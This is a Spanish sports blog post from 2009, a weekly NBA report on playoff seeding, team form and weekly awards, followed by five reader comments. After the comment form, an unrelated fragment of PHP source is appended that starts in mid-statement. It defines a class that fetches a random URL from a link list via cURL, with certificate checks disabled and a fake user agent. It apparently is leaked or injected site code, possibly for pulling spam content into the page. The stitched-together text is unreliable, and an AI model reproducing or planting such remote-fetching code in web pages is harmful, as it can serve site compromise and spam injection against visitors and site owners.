Informe Semanal TJNBA (Semana 24 y última)

13 de April de 2009 por TheDeerHunter

Último informe semanal de la temporada. Estaríamos fastidiados de que esto se acabe… si no fuera por las ganas que tenemos de que empiece lo serio. Nada tiene sentido sin los playoffs.

ON FIRE

Varios equipos lo han ganado todo esta semana, pero tras el palizón que le metieron a los Celtics anoche tenemos que volver a destacar una semana más a los Cavs. Es verdaderamente difícil hacer mejor temporada regular y ahora a ver quién va a ser el guapo que le da la vuelta a su ventaja campo. Cada día que pasa Lebron parece menos humano y sus gregarios cada día tienen más claro lo que deben hacer. Eso sí… las paridas que en ocasiones hacen  os sacan de quicio a alguno de nosotros.

En el Este los Bulls vienen de atrás como un cohete. Los Sixers han de vérselas con los dos cocos de la conferencia en sus dos últimos partidos, por lo que tienen muchas papeletas de escapar de ellos en primera ronda. Además, hay que reconocer que el equipo juega. Eso sí, su defensa es la más vulnerable de cuantos equipos se clasifican para postemporada.

Los que lo tienen claro desde hace algunos días son los Hawks y, además recuperan a Marvin Williams inmediatamente. Primera parada Miami y después Cleveland… con esto ya habrían cumplido con creces las expectativas. Además, no se porqué me da en la nariz que si algún equipo es capaz de poner nervioso a Wade y a Lebron ese puede ser Atlanta. El aperitivo contra los Heat lo veremos mañana noche, por cierto.

En el Oeste, el ritmo lo han marcado Houston y Portland, ambos con un estilo muy definido muy poco dado a las concesiones. Precísamente bien podría ser enfrentamiento de primera ronda, muy a cara de perro (y no lo decimos por McMillan). En este momento empatan con los Spurs, a una victoria de los Nuggets.

Lo que les queda:
– Nuggets: reciben a Kings y viajan a Portland.
– Spurs: viajan a Oakland y reciben a los Hornets.
– Rockets: reciben a Hornets y viajan a Dallas.
– Blazers: reciben a los Thunder y a los Nuggets.

Quien adivine cómo va a quedar el cuadro alto del Oeste se merece un premio.

AL TRAN-TRAN

Además de Spurs y Nuggets que no han terminado de marcar la diferencia con todo lo que se juegan, los Lakers velan armas esperando rival para primera ronda. Gran noticia la vuelta de Bynum y cómo ha vuelto. Esto ha repercutido directamente en la aportación del banquillo volviendo a Odom al mismo, y también en el rendimiento de Gasol que se sale de PF. Anoche jugaron 30 minutos Gasol y Kobe… por fin pueden descansar algo, aunque sea por pocos partidos.

Los Hornets también han hecho lo que podían llegar a hacer. No ha sido buena regular para los pupilos de Scott y este año no le van a dar ningún premio. Pero cuidado, que las eliminatorias son otra historia… y ya estamos viendo que a CP3 le han subido las constantes vitales.

De los que no se juegan nada en el Oeste, semana positiva para Suns y Wolves.

En el Este, hoy caen chuzos de punta en la prensa de Boston. La humillación fue terrible y puede traer  más consecuencias (agresión de Ray Allen a Varejao con lo buen chico que parecía) Será difícil mantener la cabeza fría los próximos días pero lo cierto es que no se pueden quejar con todo lo que han sufrido el último mes. El balance sigue siendo fantástico y las opciones siguen intactas con paliza o sin ella. Diría que por esto se lo van a tomar más en serio si cabe en las eliminatorias, por si alguien tenía alguna duda.

Los Heat aseguraron anoche la 5ª plaza con otra bestialidad de Wade. Detroit no va a subir más de la 8ª y ya meditan cómo parar a Lebron.

De los que no se juegan nada relativa buena semana para Indiana, Washington y Milwaukee.

EL BORDE DEL ABISMO

Mala pasada los problemas físicos en Orlando. Tendinitis de Rashard Lewis y esguince de Turkoglu precísamente ahora. Los Sixers y los Bulls se pelean por cruzarse con ellos ninguno de los dos sería rival amable con tanta baja. Como habíamos dicho los Sixers reciben a los Celtics y viajan a Cleveland. Los Bulls van a Detroit y luego tienen un enfrentamiento asequible contra Toronto. No sería nada extraño un Orlando-Chicago en primera ronda.

En el Oeste la historia se centra en evitar a Lakers. Dallas y Utah se la juegan. Los tejanos reciben a los Wolves y a los Rockets. Los mormones reciben a los Clippers pero luego tienen que viajar al Staples, además vienen jugando bastante mal, sobre todo en defensa. Lo tienen bastante claro ya.

De los que no se juegan nada, una larga lista de equipos con una victoria y gracias: Bobcats, Nets, Raptors, Knicks, Warriors, Grizzlies, Thunder y Clippers… que bien podrían estar metidos en el pozo.

EL POZO:

Esta semana sólo metemos en el pozo a los Kings que no ganan ni queriendo.

PREMIOS TJNBA

MVP: Semana bestial de Chris Paul con 32 puntos por partido, más de 12 asistencias, casi 9 rebotes y más de dos robos. Pero el MVP de Abril y también de la temporada lo seguirá siendo The King J.

Rookie: Derrick Rose es el Rookie con mayúsculas de la semana, el mes y la temporada. Estos días ha hecho 19 ppp 4,6 reb 6,4 asis y 1,4 rob.

La Sorpresa: Estaréis de acuerdo conmigo en que, a pesar del varapalo de anoche, Glenn Davis ha supuesto un valiosísimo activo para los suyos en la consecución de la 2ª plaza del Este por parte de los actuales campeones. Además… es un tipo que nos transmite honradez y simpatía, que todo cuenta en esta vida.

La decepción: Se puede ganar y perder… pero ver a un jugador exquisito como Ray Allen pegarle un codazo en los cataplines al bueno de Varejao resulta bastante grotesco. Finalmente, el bueno de Ray se ha terminado creyendo el papel ese del “Emotional Sabotage” que decía Rivers… aunque el sabotaje más bien se lo hizo a sus propios compañeros.

Comenta

5 comentarios a esta entrada

  1. couxe dice:
    #1

    Hablando de todo un poco… Chris Paul frente a Dalas ha promediado en sus 4 duelos de esta temporada contra Kidd: 33.3 puntos con un 57% en tiros, 8 rebotes, 12.5 asistencias y 3 robos en 41 minutos…
    Pocas veces he visto una superioridad tan apabullante en un duelo individual…
    Pobre Jason… los años no perdonan a nadie…

      Citar

  2. Viva_Dirk dice:
    #2

    Casi igual que Rondo en los 4 partidos contra Cleveland: 7.5 puntos, 8.8 asistencias, 3.8 rebotes y 10 de 30 en tiros. Los Celtics van a necesitar mas de el.

      Citar

  3. Txusma dice:
    #3

    He estado fuera unos dias y he leido ahora los comentarios de anteriores entradas pero como aqui Couxe habla de Paul, continuo un poco el debate.
    Creo q Paul se merece como el q mas estar en el primer quinteto y metiendo a Lebron de PF (si es q las posiciones importan mucho) no habria problemas. Para mi Paul-Wade-Kobe-Lebron-Howard ha de ser el quinteto. Y el segundo Billups, Roy, Dirk, Duncan y Pau (aqui si q habra q forzar posiciones)

      Citar

  4. Jabho dice:
    #4

    Garnett vuelve para el último partido de la regular. Es cuestión de ver como llega, pero creo que Boston lo ha hecho muy bien para tener a Garnett lesionado 20 partidos, y con él Tony Allen, Powe + algun partido de Ray Allen o Glen Davis. Incluso Scalabrine que visto como venía el tema hubiera aportado. Ha mantenido la 2ª plaza de la conferencia y 3º de la liga…. vamos, a ver a cual de los equipos de arriba le quitas a su jugador más determinante y no se resiente.

    Ayer fue un accidente pero sin garnett ha hecho buenos partidos contra buenos equipos. Ayer salió un mal partido y ya está. Más preocupante son las dos derrotas ante los Lakers con el equipo entero. Pero ayer con la 2ª plaza de la conferencia ya más o menos clara tampoco es para preocuparse. Sin garnett creo que pasamos de 1ª ronda, ala de 2ª ya no lo creo y la final o el campeonato es una utopía sin él. PEro de los equipos aspirantes es sin duda el que menos depende de su estrella.

    Sobre el tema de Rondo yo no creo que esté entre los mejores 5 bases de la liga, pero juzgarle a él (o al resto del equipo) por este partido tampoco es justo. Si eso mejor le juzgamos por el partido del miercoles que lo gana él… Sin ir más lejos el año pasado en las finales fue un jugador muy importante

      Citar

  5. JJ5 dice:
    #5

    Rajon Rondo será la pieza clave en el papel de los Celtics en Play-offs. Con o sin KG.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>